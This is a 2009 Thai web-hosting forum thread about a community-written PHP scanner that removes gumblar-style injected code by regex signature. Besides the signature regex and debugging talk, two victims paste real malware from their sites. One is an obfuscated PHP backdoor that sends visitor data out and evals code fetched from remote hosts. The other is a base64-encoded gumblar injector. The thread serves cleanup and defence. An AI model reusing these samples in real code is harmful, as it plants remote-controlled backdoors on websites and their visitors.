#(<\?.*?function_exists.*?fromCharCode.*?document\.write.*?</title>.*?gzencode.*?set_error_handler.*?\?>)#i
แปลเป็นภาษาคนจะเป็นขั้นตอนดังนี้
หา <?
ผ่านไปๆๆ
หา function_exists
ผ่านไปๆๆ
หา fromCharCode
ผ่านไปๆๆ
หา document.write
ผ่านไปๆๆ
หา </title>
ผ่านไปๆๆ
หา gzencode
ผ่านไปๆๆ
หา set_error_handler
ผ่านไปๆๆ
หา ?>

แล้ว i ท้ายสุดคือ case insensitive คือไม่สนเรื่องตัวเล็กตัวใหญ่
และผมไม่ได้ใส่ s ไว้ เพื่อแสดงว่า ทั้งหมดอยู่ในบรรทัดเดียว

นี้แค่แนวคิด 1 บรรทัดครับ ผมก็ต้องได้โค้ดที่ว่าเป็นอันตรายมาก่อน (จากตัวไฟล์เลย)
แล้วแปลงเป็น regex ใส่ไว้ กลายเป็น Virus Pattern ไว้ใช้ตรวจ

แล้วตัวโค้ดที่เหลือใน php virus remover (ตอนแรกไม่รู้ตั้งชื่อไรให้มันดี)
ก็ทำหน้าที่อ่านไฟล์ที่น่าโดนเล่นงาน และตามลบเฉพาะส่วนที่ตรวจแล้วตรงกับ Virus Pattern ครับ

:)

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: SearchMarketing ที่ 05 พฤษภาคม 2009, 22:23:05

ขอบคุณครับแล้วมันมาอยู่บนเว็บผมได้ไงอะ

ระหว่าง ftp กับผมไปโหลดสคริปใต้ดินมาใช้ไม่รู้เรื่อง

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: g-ji ที่ 05 พฤษภาคม 2009, 22:27:32

อ้างจาก: EThaiZone ที่ 05 พฤษภาคม 2009, 22:21:19

อ้างจาก: g-ji ที่ 05 พฤษภาคม 2009, 21:52:18

ของเรามัน error บรรทัดนี้อ่ะ

โค๊ด:

foreach($file as $node)

glob จริงๆ ครับ เป็นฟัีงค์ชั่นสารพัดประโยชน์
[url]http://www.thaiseoboard.com/index.php/topic,6920.msg241386.html#msg241386[/url]

ถ้าตัว glob อันนี้

โค๊ด:

$file = glob($path."*.{".$ext2."}",GLOB_BRACE);

น่าจะใช่จุดที่มีปัญหากับเรานะั เพราะมันเริ่ม error ที่บรรทัดนี้

โค๊ด:

foreach($file as $node)

แค่ ชุดนี้ชุดเดียวที่มีปัญหา

โค๊ด:

foreach($file as $node) {
		$data = @file_get_contents($node);
		foreach($virus_core as $code) {
			preg_match($code, $data, $match);
			if(!empty($match[0])) {
				$name = strtr($node, $fix);
				if(isset($_GET['debug'])) echo "<b>Filename:</b> ".$name."<br/>".$match[0]."<br/>";
				$list_problem[] = $node;
				continue;
			}
		}
	}

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 22:29:38

เออ ลืมบอกเทคนิคหนึ่งเรื่องการเขียน regex เผื่อใครอยากใช้

สังเกตนะครับ ผมไม่ได้ใช้ .* แบบชาวบ้าน
แต่ใช้ .*? แทน ภาษาของมันเรียกว่าการทำเป็น ungreedy
ซึ่งช่วยเรื่องการเขียน pattern ที่ถูกต้องได้มากๆ
เพราะปกติมันจะเป็น greedy มาแต่แรก

ยกตัวอย่าง

โค๊ด:

$str = '<a href="xxx"><b>Bla Bla</b></a>';
preg_match("#<.*>#", $str, $match); //Greedy
print_r($match);
preg_match("#<.*?>#", $str, $match); //UnGreedy
print_r($match);

ผลลัพท์
Array
(

=> <a href="xxx"><b>Bla Bla</b></a>

)
Array
(

=> <a href="xxx">

)

ใช้ให้เหมาะ แล้วโครงสร้าง web scraping ของท่านจะเจริญ

ชวนมาทำหมวกดำกันซะงั้น :D

ปล. ลืมบอก หรือใส่ U ต่อท้ายก็ได้ จะใช้ .* แต่มีผลเป็น ungreedy เหมือนกัน
อย่าไปใส่ผิดเป็น u ล่ะ เพราะ u หมายถึง unicode :P

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 22:31:52

อ้างจาก: g-ji ที่ 05 พฤษภาคม 2009, 22:27:32

อ้างจาก: EThaiZone ที่ 05 พฤษภาคม 2009, 22:21:19

อ้างจาก: g-ji ที่ 05 พฤษภาคม 2009, 21:52:18

ของเรามัน error บรรทัดนี้อ่ะ

โค๊ด:

foreach($file as $node)

ถ้าตัว glob อันนี้

โค๊ด:

$file = glob($path."*.{".$ext2."}",GLOB_BRACE);

น่าจะใช่จุดที่มีปัญหากับเรานะั เพราะมันเริ่ม error ที่บรรทัดนี้

โค๊ด:

foreach($file as $node)

แค่ ชุดนี้ชุดเดียวที่มีปัญหา

โค๊ด:

foreach($file as $node) {
		$data = @file_get_contents($node);
		foreach($virus_core as $code) {
			preg_match($code, $data, $match);
			if(!empty($match[0])) {
				$name = strtr($node, $fix);
				if(isset($_GET['debug'])) echo "<b>Filename:</b> ".$name."<br/>".$match[0]."<br/>";
				$list_problem[] = $node;
				continue;
			}
		}
	}

น่าสนใจนะ เพราะจาก php.net
Note: The GLOB_BRACE flag is not available on some non GNU systems, like Solaris.

เอาเป็นว่าเดี๋ยวเวอร์ชั่นหน้า จะทำเป็น opendir readdir แทน
ตอนนี้ต้องขอไป benchmark ดูก่อนว่าแบบใช้ regex กับไม่ใช้ (explode . แล้วถึงตัวท้าย)
แบบไหนจะไวกว่ากัน

:P

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: g-ji ที่ 05 พฤษภาคม 2009, 22:32:47

↑ เหอๆ :P

เจ๋งสุดๆ

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 22:54:13

แวะมาบอก แต่เดี๋ยวไมไ่ด้ทำต่อ ต้องปั่นงานคงค้าง
อันนี้เร็วกว่า

โค๊ด:

$ext = end(explode(".", $file));
if (in_array($ext, $config['filetype'])) {
	//echo "$file\n";

}

อันนี้ช้ากว่า

โค๊ด:

$regex = "#\.(" . implode("|", $config['filetype']) . ")$#i";
if (preg_match($regex, $file, $tmp)) {
	//echo "$file\n";

}

สรุป ไม่ว่าจะยังไง Regex ก็อืดกว่าจริงๆ
แม้ต่างกันในระดับมิลลิวินาที แต่ถ้าจำนวนไฟล์มากๆ ก็จะทำให้เห็นผลชัดขึ้น

เดี๋ยวต้องขอไปทำงานก่อน อาจเป็นพรุ่งนี้ัถึงจะมาทำเวอร์ใหม่ให้
แล้วก็ ตอนนี้ยังไม่มีใครส่งโค้ดที่เป็นไวรัสมาให้เลย

หรือใครเจอไวรัส ถ้าเจอผมออนเอ็ม ก็เข้ามาคุยกันได้นะ ::)

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: g-ji ที่ 05 พฤษภาคม 2009, 23:01:54

โค้ดที่เคยโดนเป็นอันนี้อ่ะ

โค๊ด:

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6b5c989d96a8617d098f67be813b4c3b") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

กระทู็ที่เคยตั้งไว้ตอนโดน

โค๊ด:

http://www.thaiseoboard.com/index.php/topic,57742.msg715055.html#msg715055

ปัจจุบันหลังจากCHMOD 644 ทุกไฟล์ ทุก DIR มันก็หายไปละ ไม่รู้ว่ามันมาจากไหน

ปัญหาคือ เวลาบอทมันเ้ข้ามาเว็บ ถ้าเจอไฟล์รูปใน DIR ที่มีไฟล์นั้นอยู่ จะถูก Redirect ไปยังหน้าที่มันสร้างขึ้น แล้วก็ เด้งต่อไปหน้าเว็บของมัน :(

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: Tee++; ที่ 05 พฤษภาคม 2009, 23:12:27

เยี่ยมไปเลย +1 ให้อีกคน

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: tinnoi ที่ 06 พฤษภาคม 2009, 08:11:44

ผมมีนะครับ เดี๋ยวส่งให้ ไปขอ ftp จากลูกค้าอีกทีนึงก่อนครับ

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: DakOon ที่ 06 พฤษภาคม 2009, 08:24:32

Thanks ครับ

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: Newbies ที่ 06 พฤษภาคม 2009, 08:56:09

แหล่มเลยครับ ขนาดผมว่าผมพอจะรู้เรื่อง php บ้าง แต่ดู code แล้ว เทพมากๆ
ขอบคุณครับ

อ่อ สนับสนุน ทำเป็น ajax ครับ เพราะไฟล์เยอะๆ มันรันนานจนลืมไปเลย

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: sir_15 ที่ 06 พฤษภาคม 2009, 14:59:38

มาดันกระทู้ค่ะ เหนว่ามีคนโดนเพิ่ม เผื่อกำลังหาทางแก้ไวรัสอยู่ :-*

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: Step9 ที่ 06 พฤษภาคม 2009, 15:06:05

เห็นเมื่อคืนถามถึง image.php ไม่รู้ว่ามีกระทู้นี้อ่ะ :'(

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: ต่อ ที่ 07 พฤษภาคม 2009, 19:10:55

สุดๆเพิ่งโดนเบื่อบ่ายหมาดๆหายแว๊วว ขอบคุณครับ

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: PIN ที่ 09 พฤษภาคม 2009, 16:02:51

ขอบคุณมากเลยครับ อยากจะสอบถามว่ามันใช้กับโฮสของไทยที่ใช้ Direct Admin ได้ด้วยไหมครับ ผมลองรันดูแล้วมันขึ้น error บรรทัดที่ 94 นะครับ

ขอบคุณครับ

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: ndesigns ที่ 09 พฤษภาคม 2009, 16:22:22

อ้างจาก: PIN ที่ 09 พฤษภาคม 2009, 16:02:51

ใช้ได้ไม่มีปัญหาคับ

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: PIN ที่ 09 พฤษภาคม 2009, 20:27:28

ของผมมันขึ้นประมาณนี้ครับ

Warning: Invalid argument supplied for foreach() in /home/micronfan/domains/xxxxxxxxx.com/public_html/virusscan.php on line 80

Warning: Invalid argument supplied for foreach() in /home/micronfan/domains/xxxxxxxxxxx.com/public_html/virusscan.php on line 94

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: EThaiZone ที่ 09 พฤษภาคม 2009, 21:08:26

ใครเจอ error อะไรก็แจ้งเข้ามานะครับ

พอดีช่วงนี้งานเข้าเยอะแยะ แถมอยู่ช่วงสอบปลายภาคด้วย
ผมเรียนภาคพิเศษ เวลาสอบมันไม่เหมือนชาวบ้าน

เวลามันเลยอยู่ในช่วงหัวหกก้นขวิด งานยังไล่ขวิดเ็ป็นระยะๆ

แล้วเตือนสำหรับคนใช้โค้ดของบอร์ดใต้ดิน (ไม่ขอเอ่ย ฐานะรู้กัน เพราะคนทำไม่อยากให้พูดถึง)
อย่านำสคริปนี้ไปใช้นะครับ มันยังมีบั๊กที่ผมเองยังหาแก้ปัญหาไม่ได้
บอกตามตรง งงว่าเพราะอะไร มึนถึงเป็น

โค๊ด:

Parse error: syntax error, unexpected '(' in /home/----------------- : eval()'d code on line 1

เพราะใช้ความสามารถพิเศษ คือแปลงร่างตัวเองเป็น interpreter ก็ยังหา error ไม่เจอ
ลองเรียกโดดๆ ก็ไม่ error
แต่เรียก include กลับเจอ พอตรวจไฟล์ที่มี include กลับไม่เจอ

เล่นเอางงมากมาย :-X

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: ปลาดิบ ที่ 10 พฤษภาคม 2009, 13:19:04

เพิ่งโดนที่ดรีมโฮส ขอบคุณน้องโจ้มากคับ ::)

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: SaintTakumi ที่ 15 พฤษภาคม 2009, 19:22:42

ของผมเจอที่มันเขียนโค๊ดเพิ่มส่วนหัวของไฟล์ index.php อ่ะ เซงมากไม่รู้ติดมาได้ไง

พอใช้โปรแกรมรัน เจอ 200 ไฟล์ เห้อ :-X

ขอบคุณมากๆเลยนะครับ ไม่ทราบว่าถ้าคลีนแล้ว มันจะกลับมาอีกไหม กลัวๆ :P

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: eakrin ที่ 16 พฤษภาคม 2009, 22:04:49

ผมลองสแกนดูโอสผมสองโดเมนเจอโดเมนละ 5-6 ไฟล์แต่ไม่มีชื่อบอก เลยลองไปแก้ code ดูตรงบรรทัด

โค๊ด:

146	echo '<script>status.innerHTML="Scaning Complete!";</script>
	พบทั้งหมด '.count($list).' ไฟล์';
	if(count($list) == 0) die();

[color=red]	foreach($list as $l){
		echo 'Virus found in '.$l.'<br>';
152	}[/color]

ลองรันใหม่ผลที่ได้คือ

อ้างถึง

บลาๆๆๆ ....
พบทั้งหมด 6 ไฟล์Virus found in /home/xxxxxx/public_html/wp-content/plugins/XxxxxxXXXX/js/jquery-ui-1.7.1.custom.min.js
Virus found in /home/xxxxxx/public_html/wp-includes/js/tinymce/tiny_mce.js
Virus found in /home/xxxxxx/public_html/wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin.js
Virus found in /home/xxxxxx/public_html/wp-includes/js/tinymce/plugins/media/editor_plugin.js
Virus found in /home/xxxxxx/public_html/wp-includes/js/tinymce/plugins/paste/editor_plugin.js
Virus found in /home/xxxxxx/public_html/wp-includes/js/tinymce/plugins/safari/editor_plugin.js

ผมลองส่องดูสามไฟล์แรกมันก็เป็นไฟล์จาวาสคริปธรรมดาของ wordpress นะครับ

ปล. แก้ไขลืมลบคำสำคัญ

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: thaipic ที่ 17 พฤษภาคม 2009, 03:03:08

ผมลองให้มันทำงานตรวจดูไฟล์ที่ผมโดนมันบอกไม่มีไฟล์มีปัญหาทั้งๆที่ไฟล์มีปัญหายังอยู่ดีไม่โดนกำจัดเลยอ่ะครับ

โค๊ด:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9ra2xmb3J1bS9kb21haW5zL2ZvcnVtLmtob25rYWVubGluay5pbmZvL3B1YmxpY19odG1sL1RoZW1lcy9ra2xtYXJrZXQvaW1hZ2VzL29uLW9uMi1vZmYvMDEvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2trbGZvcnVtL2RvbWFpbnMvZm9ydW0ua2hvbmthZW5saW5rLmluZm8vcHVibGljX2h0bWwvVGhlbWVzL2trbG1hcmtldC9pbWFnZXMvb24tb24yLW9mZi8wMS9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 17 พฤษภาคม 2009, 20:26:00

ผมแก้โค้ดใหม่ยกระบบแล้วนะครับ
และปิดโค้ดส่วนที่ตรวจ backdoor ของ gumblar.cn

เพราะจริงๆ มันมีส่วนของ eval base64
ซึ่งมานั่งนึกก็จะเห็นพวกเทมเพลต wordpress หลายตัวก็ใช้
เพราะคนทำเทมเพลตอยากจะใส่เครดิตไม่ให้แก้
แต่ถ้าลบดื้ๆ เทมก็พัง

ตอนนี้ระบบเป็น AJAX ล้วนๆ โหลดเซฟรัน ไม่ต้องการไฟล์ภายนอก
เพราะยัดลงไปกับตัว php แล้ว ไฟล์เลยบวมมานิดหน่อย

แก้หลายเรื่อง เช่น หลายคนอยากรู้ไฟล์ไหนที่เป็นปัญหา งานนี้แสดงตัวแดงชัดๆ
เห็นชื่อไฟล์หมด ถ้าเจอโค้ดก็จะบอกว่าเจอกี่จุด
แก้ส่วน core เช่นไม่ต้องเขียนทับในไฟล์ที่ไม่มีปัญหา (แก้ไอ้ตรงนี้ ระบบเบาขึ้น)
แต่ส่วนที่เลี่ยงไม่ได้ คือ preg ที่ยังต้องใช้
แต่ให้เทียบตอนนี้ใช้ ajax และรันซอยถี่ทีละไฟล์

ส่วนใครอยากแก้เรื่อง delay การเรียกระหว่างไฟล์ ให้หา
var delay = 500;
หน่วยเป็นมิลลิวินาที
ดังนั้นอยากแก้เป็น 2 วิ ก็ใส่ 2000

ต้องการ Request อะไรก็บอกมานะครับ

ปล. งานนี้ประชดคนใช้โดยเขียนภายใต้ error_reporting(E_ALL);
ดังนั้นถ้ามี Error ก็บอกมานะครับ (ไอ้ตรงประชดนี้ ล้อเล่นนะครับ :D)

ปล2. ช่วงนี้ปิดเทอมเลยปั่นงานกระจาย เวลาเข้าบอร์ดยังน้อยลงเลยครับ ToT

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: ndesigns ที่ 17 พฤษภาคม 2009, 20:28:53

ขอบคุณน้องโจ้มากเลยครับ :-*

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 17 พฤษภาคม 2009, 22:31:04

มีคนไปแนะนำที่ THT ด้วย

เห็นแล้วคนทำก็ปลื้มนิดๆ ครับ
http://www.thaihosttalk.com/th1/index.php?topic=19304.0

ว่าแต่ใครใช้แล้วมีปัญหา หรืออะไรที่ไม่ได้ตอบกลับ
ก็วาน PM มาถามนะครับ เพราะพอเค้นสมองปรับหมด
ไอ้คำถามที่คาๆ ค้างๆ ก็ลืมหมดเลย

:P

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: pa_koh ที่ 17 พฤษภาคม 2009, 22:53:35

ขอบคุณ มากมายครับ :'(

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: sir_15 ที่ 18 พฤษภาคม 2009, 00:41:23

ขอบคุณน้องโจ้มากเลยนะจ๊ะ :'(

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: eakrin ที่ 18 พฤษภาคม 2009, 07:30:31

ขอบคูณครับ :-*

แบบนี้แสดงว่าของผมไม่ติดเชื้อใช่ไหม

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 18 พฤษภาคม 2009, 09:59:58

อ้างจาก: eakrin ที่ 18 พฤษภาคม 2009, 07:30:31

ขอบคูณครับ :-*

แบบนี้แสดงว่าของผมไม่ติดเชื้อใช่ไหม

ของผมยังกำจัดได้แค่อันที่มาจาก gumblar.cn
เพราะคุณ sir_15 เอามาถามใน msn

แต่ส่วนจะติดจากที่อื่นไหม อันนี้แนะนำให้ติดพวก AVG มารันแล้วเปิดเข้าเว็บคุณดู
ถ้ามีมันจะแจ้ง แล้วคุณต้องตรวจสอบว่าโดนที่ไฟล์ไหน

แต่ถ้าคิดว่าทำเิองไม่ได้ เช่น บางคนไม่รู้เรื่อง php
ก็แนะนำให้ถามผมก็ได้ โดยอาจต้องขอแบ็กอัพเว็บที่เกิดปัญหาที่อยู่บนโฮส
จะได้เอามาตรวจว่ามันเป็นตรงไหน และผมได้เอามาเขียนเป็น regex ลงไว้ใน PHP Virus Remover
เพื่อคนอื่นจะมาใช้ต่อ จะได้ใช้งานได้

สรุป คือใครที่เอาไปใช้ตอนนี้ แล้วลบหาเจอได้
แสดงว่าโดนตัวเดียวกันกับที่คุณ sir_15 โดนมา
เพราะตอนนี้ยังไม่มีใครส่งโค้ดมาเพิ่มเลย

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: ปิง^^ ที่ 18 พฤษภาคม 2009, 10:31:08

:P กำลังโดนพอดัีเลยครับ ขอบคุณคับ :-*

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: mrbov ที่ 18 พฤษภาคม 2009, 11:06:46

:) แล้วเวลาอัพเดทที่โฮสต์ ผ่าน ftp จะต้องมีขั้นตอนยังงัยครับ เพราะ ค่า mdsum ต้องเปลี่ยน สคริปส์จะเอาไฟล์ก่อนหน้าอัพเดทมาทับอีกหรือเปล่า

ขอโทษที่ถามโง่ๆ เพราะไม่รู้จริง ขออภัย

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: skyp_s ที่ 18 พฤษภาคม 2009, 15:50:03

ผมก็โดนเหมือนกันครับ
ทำอย่างไรดี เป็นเดือนแล้วนี่ โดน ทั้ง หมด 4 เว็บเลย

update web ตัวไหนก็โดนหมดเลย

บอก วิธีแก้ไหนครับ

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: raon10 ที่ 18 พฤษภาคม 2009, 16:07:59

เวปผมโดน Pattaya Hotel – Jomtien Thani Hotel Particular Place of Vertical ...
- การเยี่ยมชม 18 ครั้ง - 28 เม.ย. - [ แปลหน้านี้ ]ไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ

พึ่งจะโดนเมื่อวันพฤหัสบดีที่ผ่านมาครับ ไม่มีความรู้เรือ่ง php เลยยังทำไม่เป็น
แต่สรุปได้ไว่ปโหลด AVG มาแสกนหาก่อนว่าติดอะไรมา :P

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: Popu ที่ 18 พฤษภาคม 2009, 16:38:11

ไม่กล้าคิดเลยว่าถ้าเจอแล้วจะเป็นยังไง

หัวข้อ: Re: PHP Virus Remover AJAX By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 18 พฤษภาคม 2009, 21:24:49

แวะมาบอกเพิ่ม สำหรับใครที่โดนกูเกิ้ลบอกว่า "ไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ"
วิธีตรวจสอบว่าโดนอะไร ให้พิมพ์เข้าตามนี้ครับ

โค๊ด:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=th&site=www.โดเมนของท่าน.com

มีของท่านหนึ่ง เจอแบบนี้

สถานะในรายการของ xxxxxxx.com ปัจจุบันเป็นอย่างไร

    ไซต์นี้อยู่ในรายการต้องสงสัย - การเข้าชมเว็บไซต์นี้อาจก่อให้เกิดอันตรายต่อคอมพิวเตอร์ของคุณ

    บางส่วนของไซต์นี้ถูกจัดอันดับไว้ในกิจกรรมที่ต้องสงสัยจำนวน 5 ครั้งเกินกว่า 90 วันที่ผ่านมา

เกิดอะไรขึ้นเมื่อ Google เยี่ยมชมไซต์นี้

    เรา ได้ทดสอบหน้าเว็บจำนวน 136 หน้าเป็นระยะเวลาเกินกว่า 90 วันที่ผ่านมา หน้าเว็บจำนวน 77 หน้า มีซอฟต์แวร์ที่เป็นอันตรายที่กำลังถูกดาวน์โหลดและติดตั้งโดยไม่ได้รับความ ยินยอมจากเจ้าของเครื่อง Google เข้าชมไซต์ครั้งล่าสุดเมื่อวันที่ 2009-05-18 และพบเนื้อหาต้องสงสัยครั้งล่าสุดเมื่อวันที่ 2009-05-18

    Malicious software includes 125 scripting exploit(s).

    ซอฟต์แวร์ที่เป็นอันตรายถูกโฮสต์ไว้ในโดเมนจำนวน 1 โดเมนรวมทั้ง gumblar.cn/ ด้วย

โดน gumblar.cn แฮะ ตัวนี้แหละที่หลายคนโดนกันมากๆ :P

ว่าแต่ผมจำไม่ได้ว่าใครเคยพิมพ์ไว้ เรื่องการขอให้กูเกิ้ลกลับมาตรวจสอบ
และปรับสถานะการติดไวรัสอีกรอบ ใครจำได้ช่วย PM บอกผมด้วยนะครับ

ตอนนี้กำลังค้นจะได้ทำลิงค์บอกเพื่อนๆ ไว้เลย
เพื่อใครที่ลองแก้แล้ว จะได้ตรวจสอบได้ ว่ามันแก้ได้หมดไหม

ตัว gumblar.cn มีโค้ดหลายรูปแบบมากๆ ยอมรับไอ้คนทำจริงๆ จับไมไ่ด้ ไล่ไม่ทัน

:-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.4 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: DragonBallZ ที่ 18 พฤษภาคม 2009, 22:56:34

เรื่องการขอให้Googleกลับมาตรวจสอบและปรับสถานะการติดไวรัสอีกรอบ ตามลิงค์ข้างล่างเลยครับ ::)

